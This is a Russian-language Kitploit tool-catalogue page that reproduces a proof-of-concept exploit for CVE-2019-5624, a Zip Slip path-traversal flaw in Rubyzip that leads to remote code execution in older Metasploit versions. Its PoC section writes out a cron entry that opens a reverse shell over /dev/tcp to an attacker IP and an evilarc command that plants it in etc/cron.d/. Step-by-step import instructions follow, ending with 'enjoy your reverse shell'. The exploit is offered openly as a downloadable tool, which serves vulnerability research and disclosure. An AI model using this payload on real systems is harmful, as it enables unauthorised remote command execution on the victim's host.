Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-5624 — Доказательство концепции для уязвимости CVE-2019-5624 в Metasploit (небезопасная обработка ZIP-архивов в Rubyzip, приводящая к RCE) | Kitploit
Инструменты/GitHubGitHub/voidsec/cve-2019-5624
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Доказательство концепции для уязвимости CVE-2019-5624 в Metasploit (небезопасная обработка ZIP-архивов в Rubyzip, приводящая к RCE)

Репозиторий
13537 лет назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-5624

Доказательство концепции для уязвимости CVE-2019-5624 в Metasploit (небезопасная обработка ZIP-архивов в Rubyzip с удалённым выполнением кода)

Введение

В феврале 2019 года я обнаружил новую уязвимость в библиотеке Rubyzip. Она позволяет злоумышленнику использовать небезопасную обработку ZIP-архивов (Zip Slip), что приводит к удалённому выполнению команд.

Эта уязвимость была использована для атак на все версии Metasploit ниже 5.0.18 Metasploit Wrap-Up

Я подготовил подробную запись в блоге, в которой объясняется эта уязвимость.

POC

  • Создайте файл со следующим содержимым:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Сформируйте ZIP-архив с полезной нагрузкой обхода пути:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Добавьте в ZIP-файл допустимое рабочее пространство MSF (чтобы MSF извлёк его, в противном случае он откажется обрабатывать ZIP-архив)
  • Настройте два прослушивателя: один на порту 4444, а другой на порту 4445 (обратную оболочку вы получите на порту 4445)
  • Войдите в веб-интерфейс MSF
  • Создайте новый «Проект»
  • Выберите «Импорт», «Из файла», укажите вредоносный ZIP-файл и, наконец, нажмите кнопку «Импорт»
  • Дождитесь завершения процесса импорта
  • Наслаждайтесь своей обратной оболочкой
  • Видео

    Скачать инструмент